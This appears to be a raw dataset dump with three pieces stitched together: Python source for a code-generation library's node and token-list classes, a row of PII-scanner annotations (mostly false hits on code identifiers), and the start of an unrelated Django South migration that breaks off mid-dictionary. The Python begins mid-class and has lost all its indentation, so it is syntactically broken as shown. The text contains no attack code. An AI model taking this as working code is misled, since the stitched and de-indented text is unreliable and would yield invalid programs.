"""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given
attribute of a given instance.
    It creates stubs that allow transparent composition for the most limited subset of the APIs
    provided by this library, to avoid getting into crazy things.
This class should really be used when this enable to factor lots of code. A design based on
hooks implemented in subclasses called by a base class is preferable in most case where you
would be tempted to use this proxy.
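
    For example (an illustrative sketch; ``some_node`` is assumed to have a
    ``body`` attribute which is itself a :class:`NodeABC`)::

        proxy = NodeAttrProxy(some_node, 'body')
        snippet = proxy.inline_str()  # forwards to some_node.body.inline_str()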
"""
def __init__(self, obj, attr_name):
self.obj = obj
self.attr_name = attr_name
def inline_str(self, idt=None):
return getattr(self.obj, self.attr_name).inline_str(idt)
def freestanding_str(self, idt=None):
return getattr(self.obj, self.attr_name).freestanding_str(idt)
def adopt_node(self, child):
return getattr(self.obj, self.attr_name).adopt_node(child)
class EnsureNode:
"""This class is a descriptor that makes sure that the attribute that uses it holds a reference
to an instance of one of the classes given in *node_classinfo*.
    When set, this descriptor checks whether the given object is indeed an instance of one of the *node_classinfo* classes.
    If not, it calls *node_factory* to build an object and stores its return value. Therefore,
the content of the attribute using this descriptor is always some instance of the classes
contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions
    on the type of data held by the attribute.
.. note:: The *node_classinfo* always contains the class :class:`NodeABC`.
"""
def __init__(self, storage_attr_name, node_factory, node_classinfo=()):
"""
:param storage_attr_name: the underlying attribute used to store the object.
:param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute.
        :param node_classinfo: this is a tuple that contains classes.
The value stored in the attribute is checked against this tuple using :func:`isinstance` to
determine if the factory should be used. This always contains at least :class:`NodeABC`
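
        For example, a node class can guarantee that its *comment* attribute
        always holds a node (an illustrative sketch, following the convention
        mentioned in :class:`NodeBase`)::

            class MyNode(NodeBase):
                comment = EnsureNode('_comment', node_factory=PhantomNode)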
"""
self.storage_attr_name = storage_attr_name
self.node_factory = node_factory
node_classinfo = listify(node_classinfo)+[NodeABC]
if inspect.isclass(self.node_factory):
node_classinfo.append(self.node_factory)
node_classinfo = tuple(node_classinfo)
self.node_classinfo = node_classinfo
def __get__(self, instance, owner):
if instance is not None:
return instance.__dict__[self.storage_attr_name]
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
instance.__dict__[self.storage_attr_name] = value
class NodeBase(NodeABC):
"""This class is the base classes of most nodes.
It provides some default implementations for methods of :class:`NodeABC`.
"""
@classmethod
def ensure_node(cls, obj, factory=None):
"""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC`
, and if not, tries to build a node from it using the class this class method is called from or *factory*.
.. note:: You should better use the :class:`EnsureNode` descriptor when possible, instead of making a use of
this class method.
.. warning:: Not every class supports to be called whith only one parameter, so a call to this
class method is note is not guaranteed to succeed.
:param obj: the object to build a node from.
:param factory: an optional factory used to build the node from *obj*. If not provided, the class this
        method is called from is called with *obj* as its first and only parameter.
"""
if isinstance(obj, (cls, NodeABC)):
return obj
else:
if factory is not None:
return factory(obj)
else:
return cls(obj)
def __init__(self, comment=None, side_comment=None, parent=None):
""" All of the paramaters should be used as keyword arguments, because they are forwarded from
the children classes and the order at the arrival is not guaranteed.
:param comment: a comment node that will be printed next to the current node when the source code of
the node is generated. Usually, it is a block comment printed before the node
in languages that supports them. This comment is printed by the containers such as
:class:`NodeContainerBase`, so it does not require any support from the class.
:param side_comment: a comment that will be printed just by the current node when the source code of
                             the node is generated. Usually, it is a one-line comment, printed to the right of the
node. Be aware that this parameter is used by the class in whatever way it wants to,
and there is no guarantee it will be printed at all.
"""
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.comment = comment
# Should be EnsureNode descriptors with factory using phantom_node when given None in derived classes
self.side_comment = side_comment
        # We don't use try: ... except: to avoid catching exceptions
        # occurring inside the adopt_node call
if parent is not None:
if hasattr(parent, 'adopt_node'):
parent.adopt_node(self)
else:
raise NotImplementedError("The given parent does not support child adoption")
def freestanding_str(self, idt=None):
"""See :class:`NodeABC` for the role of this function.
This implementation just calls *inline_str* and prepends a new line and indentation string.
"""
idt = Indentation.ensure_idt(idt)
snippet = self.inline_str(idt)
# Do not output anything if the string is empty
if snippet:
return '\n'+str(idt)+snippet
else:
return ''
def __str__(self, idt=None):
"""This implementation tries to print the node by probing the object for some methods:
1. *decl()*: it is usually used to return a :class:`NodeViewBase` corresponding to the declaration of the node
2. *defi()*: it is usually used to return a :class:`NodeViewBase` corresponding to the definition of the node
3. *freestanding_str()*: see :class:`NodeABC`
"""
        # We don't use try: ... except: to avoid catching exceptions
        # occurring inside the freestanding_str call
# Try to display a declaration
if hasattr(self, 'decl'):
self_decl = self.decl()
if isinstance(self_decl, NodeABC):
return self_decl.freestanding_str(idt)
# Or a definition
elif hasattr(self, 'defi'):
self_defi = self.defi()
if isinstance(self_defi, NodeABC):
return self_defi.freestanding_str(idt)
else:
return self.freestanding_str(idt)
def adopt_node(self, child):
self.append(child)
class DelegatedAttribute:
"""This class is a descriptor that allows an object to use the value of that attribute of another instance.
For example, the comment attribute of a parent node of a :class:`NodeViewBase` instance is used as the comment
attribute of the :class:`NodeViewBase` instance if the comment attribute was not explicitly set on the
    :class:`NodeViewBase` instance. When that attribute is set, it uses its own object instead of referring to its parent
one.
"""
def __init__(self, attr_name, delegated_to_attr_name, descriptor=None, default_value_list=tuple()):
"""
:param attr_name: the name of the attribute to manage.
:param delegated_to_attr_name: the name of the attribute holding a reference to the other instance also
holding an *attr_name* attribute.
:param descriptor: a descriptor class, in case the attribute should be managed through a descriptor.
This allows basic descriptor chaining.
:param default_value_list: a list of default values that does not trigger the switch to the local attribute.
                                   For example, if a class sets a *comment* attribute to None by default, the attribute
                                   lookup should still be made in the other instance. That way, it allows some placeholder
value to be set, without altering the intended behavior.
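
        For example, a view node can fall back to its parent's comment until one
        is explicitly set on the view itself (an illustrative sketch)::

            class MyView(NodeViewBase):
                comment = DelegatedAttribute('comment', 'parent',
                                             default_value_list=(None,))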
"""
self.attr_name = attr_name
self.delegated_to_attr_name = delegated_to_attr_name
self.descriptor = descriptor
self.default_value_list = default_value_list
def __get__(self, instance, owner):
if instance is not None:
# If the attribute has been set on the instance, just get it
if instance.__dict__.get('__'+self.attr_name+'_is_set', False):
if self.descriptor is not None:
return self.descriptor.__get__(instance, owner)
else:
return instance.__dict__[self.attr_name]
# Else it means that the attribute has not been set,
# so we delegate to the parent
else:
parent = getattr(instance, self.delegated_to_attr_name)
return getattr(parent, self.attr_name)
# If the descriptor is called as a class attribute, it
# just returns itself, to allow the world to see that it
# is a descriptor
else:
return self
def __set__(self, instance, value):
if self.descriptor is not None:
self.descriptor.__set__(instance, value)
else:
instance.__dict__[self.attr_name] = value
# If the value is one of the default_value_list, do not consider that the attribute was
# set. This allows some code in base classes to set the attribute to None
# by default, and still get the parent's attribute when it is the case
if value not in self.default_value_list:
instance.__dict__['__'+self.attr_name+'_is_set'] = True
class NodeViewBase(NodeBase):
"""This is the base class of the node that are view of other node.
For example, a variable declaration is a view of the variable, as it only displays
    information already contained in the variable object.
View nodes should store the reference of their parent in a *parent* attribute.
"""
def __init__(self, parent, *args, **kwargs):
self.parent = parent
super().__init__(*args, **kwargs)
def __eq__(self, other):
"""implementation of the equality test between two views:
it tests to see if they have the same parent and if the two view
are of the exact same type.
"""
return type(self) is type(other) and self.parent is other.parent
class PhantomNode(NodeBase):
"""This class is a node that will be printed as an empty string.
This is intended to be used as a placeholder when a :class:`NodeABC` instance is required.
"""
    # PhantomNode must not call NodeBase.__init__ because it causes infinite
    # recursion when built from NodeBase.__init__
def __init__(self, *args, **kwargs):
self.parent = self
self.comment = self
self.side_comment = self
def inline_str(self, idt=None):
return ''
freestanding_str = inline_str
# Instance used everywhere, instead of creating billions of identical PhantomNode
PHANTOM_NODE = PhantomNode()
class NodeContainerBase(NodeBase, collections.MutableSequence, NonIterable):
"""This is the base class of all the nodes that contains a list of other nodes.
    It implements all the logic for operator overloading, and for printing the nodes that it takes care of.
It also derives from the :class:`collections.MutableSequence` abstract base class, so it behaves
like a list. The only exception is when given to :func:`listify`, it remains as a single object, because
it also derives from :class:`NonIterable`. This is intended to allow the user to add nodes to it later,
and the result should be taken into account by the consumer that used :func:`listify` on it. If it was not the case,
the consumer using :func:`listify` would end up with a list of nodes frozen at the time :func:`listify` is called.
The other important aspect of this class is that it can guarantee the type of the contained nodes, even when
overloaded operators like *+=* are used. See the *node_classinfo* and *node_factory* constructor arguments.
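
    A minimal concrete subclass only needs to provide the two abstract operators,
    mirroring their default bodies (an illustrative sketch; a usable subclass
    would typically also pass *node_classinfo* to the constructor)::

        class Block(NodeContainerBase):
            def __add__(self, other):
                return type(self)((self, other))
            def __radd__(self, other):
                return type(self)((other, self))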
"""
default_node_classinfo = (NodeABC,)
def __init__(self, node_list=None, node_classinfo=None, node_factory=None, *args, **kwargs):
"""
:param node_list: the list of nodes that the container contains
:param node_classinfo: a tuple of classes used to check the nodes that enters the container.
If a node is not an instance of one of the *node_classinfo* classes, it is
passed to *node_factory*. All of the classes in *node_classinfo* must be
subclasses of :class:`NodeABC`.
:param node_factory: a factory used when an object which is not an instance of one of the classes of
*node_classinfo* tries to enter the container. The return value of this factory
is then allowed inside.
"""
node_classinfo_tuple = tuple(listify(node_classinfo))
for classinfo in node_classinfo_tuple:
if not issubclass(classinfo, NodeABC):
raise ValueError('node_classinfo must be a subclass of NodeABC')
node_list = listify(node_list)
if node_classinfo is None:
self.node_classinfo = self.default_node_classinfo
else:
self.node_classinfo = node_classinfo_tuple
if node_factory is None:
# If the node_classinfo is None, then self.node_classinfo contains default_node_classinfo
# which is only composed of NodeABC, and therefore cannot be used as a factory
if node_classinfo is None:
raise ValueError(
'You must specify a node factory or give a class that can be used as a factory as first item of node_classinfo'
)
# The first element in the tuple is taken as the factory
node_factory = self.node_classinfo[0]
# A wrapper to make sure that the output of the node_factory is
# indeed a NodeABC
def make_node_factory_wrapper(factory):
def wrapper(node):
result = factory(node)
if not isinstance(result, NodeABC):
raise ValueError("The node factory did not give a NodeABC")
else:
return result
return wrapper
self.node_factory = make_node_factory_wrapper(node_factory)
self.node_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in node_list
]
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
"""Print all the contained nodes using their *freestanding_str* method,
because a container is a freestanding context.
It also strips the blank lines at the beginning.
"""
snippet = ""
for node in self.node_list:
if hasattr(node, 'comment'):
snippet += node.comment.freestanding_str(idt)
snippet += node.freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def freestanding_str(self, idt=None):
"""Calls super().freestanding_str, and strip the blank lines
at the beginning.
"""
snippet = super().freestanding_str(idt)
return strip_starting_blank_lines(snippet)
def __copy__(self):
cls = type(self)
new_obj = cls.__new__(cls)
new_obj.__dict__.update(self.__dict__)
new_obj.node_list = copy.copy(self.node_list)
new_obj.node_classinfo = copy.copy(self.node_classinfo)
new_obj.node_factory = copy.copy(self.node_factory)
return new_obj
def clear(self):
# We preserve the object's itself, we do not build a new one
self[:] = []
def insert(self, index, value):
elem_list = listify(value)
for i, elem in enumerate(elem_list):
if not isinstance(elem, self.node_classinfo):
elem = self.node_factory(elem)
self.node_list.insert(index+i, elem)
def index(self, *args, **kwargs):
return self.node_list.index(*args, **kwargs)
def count(self, *args, **kwargs):
return self.node_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.node_list.pop(*args, **kwargs)
def reverse(self):
self.node_list.reverse()
def remove(self, *args, **kwargs):
self.node_list.remove(*args, **kwargs)
@abc.abstractmethod
def __add__(self, other):
return type(self)((self, other))
@abc.abstractmethod
def __radd__(self, other):
return type(self)((other, self))
def __iadd__(self, other):
other_list = listify(other)
typed_other_list = [
item if isinstance(item, self.node_classinfo) else self.node_factory(item)
for item in other_list
]
self.node_list.extend(typed_other_list)
return self
def append(self, other):
self.__iadd__(other)
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy.node_list = self.node_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, other):
return self.__mul__(other)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self.node_list *= other
return self
else:
return NotImplemented
def __contains__(self, item):
return item in self.node_list
def __reversed__(self):
return reversed(self.node_list)
def __getitem__(self, key):
return self.node_list[key]
def __setitem__(self, key, value):
if not isinstance(value, self.node_classinfo):
value = self.node_factory(value)
self.node_list[key] = value
def __delitem__(self, key):
del self.node_list[key]
def __len__(self):
return len(self.node_list)
def __iter__(self):
return iter(self.node_list)
class TokenListABC(NodeBase, NonIterable, collections.MutableSequence):
"""This class is an abstract base class for all classes that are token lists.
A token list is an object that holds a sequence of tokens, which get concatenated when printed.
    The tokens are turned into strings only when the token list is printed, which is why it is
    the lazy building block of source code constructs like expressions and many others.
    When printed, the token list should call *inline_str* on its tokens if the token is a :class:`NodeABC`,
or the builtin :func:`str` otherwise.
"""
pass
class DelegatedTokenListBase(TokenListABC):
"""This is the base class for token lists classes that forward the calls to the :class:`TokenListABC` API
to an attribute.
This class implements stubs to allow transparent object composition.
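
    For example, a class can hold the real token list in an ``expr`` attribute
    and still be used as a token list itself (an illustrative sketch)::

        class Statement(DelegatedTokenListBase):
            def __init__(self, tokens):
                self.expr = TokenListBase(tokens)
                super().__init__('expr')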
"""
@property
def tokenlist_attr(self):
"""This property gives the attribute holding the real token list."""
attr = getattr(self, self.tokenlist_attr_name)
if not isinstance(attr, TokenListABC):
raise AttributeError('The attribute '+self.tokenlist_attr_name+' is not a TokenListABC')
else:
return attr
@tokenlist_attr.setter
def tokenlist_attr(self, value):
return setattr(self, self.tokenlist_attr_name, value)
def __init__(self, tokenlist_attr_name, *args, **kwargs):
"""
:param tokenlist_attr_name: the name of the attribute holding the real token list
"""
self.tokenlist_attr_name = tokenlist_attr_name
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
return self.tokenlist_attr.inline_str(idt)
def freestanding_str(self, idt=None):
return self.tokenlist_attr.freestanding_str(idt)
def index(self, *args, **kwargs):
return self.tokenlist_attr.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self.tokenlist_attr.insert(*args, **kwargs)
def count(self, *args, **kwargs):
return self.tokenlist_attr.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self.tokenlist_attr.pop(*args, **kwargs)
def reverse(self):
self.tokenlist_attr.reverse()
def remove(self, *args, **kwargs):
self.tokenlist_attr.remove(*args, **kwargs)
def __add__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__add__(other)
return self_copy
def __radd__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__radd__(other)
return self_copy
def append(self, other):
self.tokenlist_attr.append(other)
def __iadd__(self, *args, **kwargs):
self.tokenlist_attr.__iadd__(*args, **kwargs)
return self
def extend(self, other_list):
self.tokenlist_attr.extend(other_list)
def __mul__(self, other):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__mul__(other)
return self_copy
def __rmul__(self, *args, **kwargs):
self_copy = copy.copy(self)
self_copy.tokenlist_attr = self_copy.tokenlist_attr.__rmul__(*args, **kwargs)
return self_copy
def __imul__(self, other):
self.tokenlist_attr.__imul__(other)
return self
def __contains__(self, *args, **kwargs):
return self.tokenlist_attr.__contains__(*args, **kwargs)
def __iter__(self):
return self.tokenlist_attr.__iter__()
def __reversed__(self):
return self.tokenlist_attr.__reversed__()
def __getitem__(self, key):
return self.tokenlist_attr.__getitem__(key)
def __setitem__(self, key, value):
self.tokenlist_attr.__setitem__(key, value)
def __delitem__(self, key):
self.tokenlist_attr.__delitem__(key)
def __len__(self):
return self.tokenlist_attr.__len__()
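# Usage sketch for DelegatedTokenListBase (illustrative only, not part of the
# original API surface; NodeBase's constructor signature is defined earlier in
# this module, so the exact super().__init__ arguments may differ):
#
#     class Expression(DelegatedTokenListBase):
#         def __init__(self, tokens):
#             self.tokens = TokenListBase(tokens)
#             super().__init__('tokens')
#
#     expr = Expression(['a', '+', 'b'])
#     expr.append('+c')       # forwarded to expr.tokens
#     expr.inline_str()       # -> 'a+b+c'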
class TokenListBase(TokenListABC):
"""This base class implements the :class:`TokenListABC` API with all of the operators overloading logic.
"""
def __init__(self, token_list=None, *args, **kwargs):
"""
:param token_list: the list of tokens to store inside the token list
"""
self._token_list = listify(token_list)
super().__init__(*args, **kwargs)
def inline_str(self, idt=None):
"""Print the tokens of the token list usin, and concatenate all the strings.
If the token is a :class:`NodeABC`, its *inline_str* method is used.
otherwise, :func:`str` builtin is called on the token.
"""
string = ''
for token in self._token_list:
if token is self:
                # Special handling of self: allows the token list to print itself using
                # a different method, to avoid infinite recursion and to provide
                # a means for subclasses to implement self-printing without creating a
                # "self-printer" class dedicated to printing themselves
string += self.self_inline_str(idt)
elif isinstance(token, NodeABC):
string += token.inline_str(idt)
else:
string += str(token)
return string
def index(self, *args, **kwargs):
return self._token_list.index(*args, **kwargs)
def insert(self, *args, **kwargs):
return self._token_list.insert(*args, **kwargs)
def count(self, *args, **kwargs):
return self._token_list.count(*args, **kwargs)
def pop(self, *args, **kwargs):
return self._token_list.pop(*args, **kwargs)
def reverse(self):
self._token_list.reverse()
def remove(self, *args, **kwargs):
self._token_list.remove(*args, **kwargs)
def __add__(self, other):
if isinstance(other, TokenListABC):
other_list = list(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
# The result of the addition with a NodeContainer is a NodeContainer
elif isinstance(other, NodeContainerBase):
return other.__radd__(self)
else:
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = self._token_list+other_list
return self_copy
def __radd__(self, other):
other_list = listify(other)
self_copy = copy.copy(self)
self_copy._token_list = other_list+self._token_list
return self_copy
def append(self, other):
if isinstance(other, TokenListABC):
other_list = tuple(other)
else:
other_list = listify(other)
self._token_list.extend(other_list)
return self
def __iadd__(self, *args, **kwargs):
self.append(*args, **kwargs)
return self
def extend(self, other_list):
other_list = listify(other_list)
for other in other_list:
self.append(other)
def __mul__(self, other):
if isinstance(other, numbers.Integral):
self_copy = copy.copy(self)
self_copy._token_list = self._token_list * other
return self_copy
else:
return NotImplemented
def __rmul__(self, *args, **kwargs):
return self.__mul__(*args, **kwargs)
def __imul__(self, other):
if isinstance(other, numbers.Integral):
self._token_list *= other
return self
else:
return NotImplemented
def __contains__(self, *args, **kwargs):
return self._token_list.__contains__(*args, **kwargs)
def __iter__(self):
return iter(self._token_list)
def __reversed__(self):
return reversed(self._token_list)
def __getitem__(self, key):
return self._token_list[key]
def __setitem__(self, key, value):
self._token_list[key] = value
def __delitem__(self, key):
del self._token_list[key]
def __len__(self):
return len(self._token_list)
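# Usage sketch for TokenListBase (illustrative; assumes the class is concrete
# enough to instantiate at this point in the module):
#
#     decl = TokenListBase(['int ', 'x'])
#     decl += [' = ', 42, ';']    # __iadd__ delegates to append()
#     decl.inline_str()           # -> 'int x = 42;'
#
# Non-NodeABC tokens (like the integer 42) are only converted with str() at
# print time, which is what makes token lists lazy building blocks.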
class _IndentedTokenListBase:
"""This class is the base class that implements a token list which indents its content when printed."""
def inline_str(self, idt=None):
idt = Indentation.ensure_idt(idt)
snippet = super().inline_str(idt)
indented_new_line = "\n"+str(idt)
snippet = snippet.replace("\n", indented_new_line)
return snippet
class IndentedTokenListBase(_IndentedTokenListBase, TokenListBase):
"""This class is a base class for token lists that indent their content when printed."""
pass
class IndentedDelegatedTokenListBase(_IndentedTokenListBase, DelegatedTokenListBase):
"""This is a mix between :class:`DelegatedTokenListBase` and :class:`IndentedTokenListBase`."""
pass
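# Indentation sketch (illustrative; Indentation comes from earlier in this
# module and its constructor is assumed here):
#
#     body = IndentedTokenListBase(['a = 1', '\n', 'b = 2'])
#     body.inline_str(idt)   # every '\n' in the snippet becomes '\n' + str(idt)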
class BacktraceBase(TokenListBase, NonIterable, metaclass=abc.ABCMeta):
"""This base class allows the instances to record the backtrace of the Python code that
created them.
    This allows one to add comments in generated source code showing which file and line of the Python
    script were responsible for creating it. This is a helpful facility when debugging the source code
    generator, and can avoid headaches when one wants to track down which line of Python generated
    which line of generated source code.
As a convenience, it is a subclass of :class:`TokenListBase` so it can be used inside a comment for example.
"""
__frame_format_string = '{filename}:{lineno}({function})'
__frame_joiner = ', '
def __init__(self, level=0, *args, **kwargs):
stack = inspect.stack()
self.stack_frame_list = [
frame[1:] for frame in stack
if os.path.dirname(frame[1]) != os.path.dirname(__file__)
]
super().__init__(self, *args, **kwargs)
@abc.abstractmethod
def freestanding_str(self, idt=None):
        # Subclasses should construct a comment with *self* as a token and use the comment's freestanding_str method
pass
def self_inline_str(self, idt=None):
return self.__frame_joiner.join(
self.__frame_format_string.format(
filename = os.path.relpath(frame[0]),
lineno = frame[1],
function = frame[2],
line_content = frame[3][frame[4]] if frame[3] is not None else ''
) for frame in self.stack_frame_list
)
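# Concrete subclasses of BacktraceBase only need to provide freestanding_str(),
# typically by wrapping themselves in a comment node (sketch; 'Com' is a
# hypothetical comment class standing in for whatever comment construct this
# library defines elsewhere):
#
#     class Backtrace(BacktraceBase):
#         def freestanding_str(self, idt=None):
#             return Com(self).freestanding_str(idt)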
| 41,613 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'Douglas RAILLARD'], ['PERSON', 'lower_underscore_case'], ['PERSON', "bases[0].__dict__['_'+bases[0].__name__+'__format_string"], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self.comment'], ['PERSON', 'decl'], ['PERSON', 'freestanding_str'], ['PERSON', 'decl'], ['LOCATION', 'self.descriptor.__set__(instance'], ['PERSON', 'freestanding_str = inline_str\n\n'], ['PERSON', 'default_node_classinfo ='], ['PERSON', "ValueError('node_classinfo"], ['NRP', 'node_list'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['LOCATION', 'self.node_classinfo'], ['PERSON', '@abc.abstractmethod'], ['PERSON', '@abc.abstractmethod'], ['LOCATION', 'isinstance(item'], ['LOCATION', 'self.node_classinfo'], ['NRP', 'self_copy.node_list'], ['LOCATION', 'self.node_classinfo'], ['PERSON', 'Whan'], ['PERSON', '@tokenlist_attr.setter\n def'], ['LOCATION', 'TokenListBase'], ['LOCATION', 'IndentedDelegatedTokenListBase(_IndentedTokenListBase'], ['PERSON', '@abc.abstractmethod'], ['PERSON', 'lineno ='], ['PERSON', 'line_content = frame[3][frame[4]'], ['URL', 'http://www.gnu.org/licenses/'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'collections.It'], ['URL', 'collections.It'], ['URL', 'token.ca'], ['URL', 'token.ca'], ['URL', 'idt.in'], ['URL', 'numbers.Int'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'self.in'], ['URL', 'collections.It'], ['URL', 'NodeABC.in'], ['URL', 'NodeABC.se'], ['URL', 'self.in'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.at'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'inspect.is'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.st'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'parent.ad'], ['URL', 'self.in'], ['URL', 'self.de'], ['URL', 'decl.fr'], ['URL', 'self.de'], ['URL', 'defi.fr'], ['URL', 'self.fr'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.de'], ['URL', 'self.at'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.pa'], ['URL', 'self.com'], ['URL', 'self.si'], ['URL', 'collections.Mu'], ['URL', 'collections.Mu'], ['URL', 'self.no'], ['URL', 'self.de'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'node.comment.fr'], ['URL', 'node.fr'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'obj.no'], ['URL', 'copy.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.in'], ['URL', 'self.no'], ['URL', 'list.co'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'list.re'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'copy.no'], ['URL', 'self.no'], ['URL', 'numbers.Int'], ['URL', 
'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'collections.Mu'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.se'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.fr'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.in'], ['URL', 'self.to'], ['URL', 'attr.co'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'self.to'], ['URL', 'attr.re'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'copy.co'], ['URL', 'copy.to'], ['URL', 'copy.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.to'], ['URL', 'self.se'], ['URL', 'token.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.in'], ['URL', 'list.co'], ['URL', 'list.re'], ['URL', 'list.re'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'copy.co'], ['URL', 'numbers.Int'], ['URL', 'snippet.re'], ['URL', 'inspect.st'], ['URL', 'self.st'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'joiner.jo'], ['URL', 'string.fo'], ['URL', 'os.path.re'], ['URL', 'self.st']] |
41 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
db.execute("create index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment (id, visibility, parent_comment_id);")
def backwards(self, orm):
raise RuntimeError("Cannot reverse this migration.")
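    # A reversible variant would drop the index instead (a sketch, not part of
    # the original migration; index-dropping syntax varies by backend, e.g.
    # MySQL requires "drop index <name> on <table>"):
    #
    #     def backwards(self, orm):
    #         db.execute("drop index canvas_comment_id_and_visibility_and_parent_comment_id on canvas_comment;")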
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '254', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
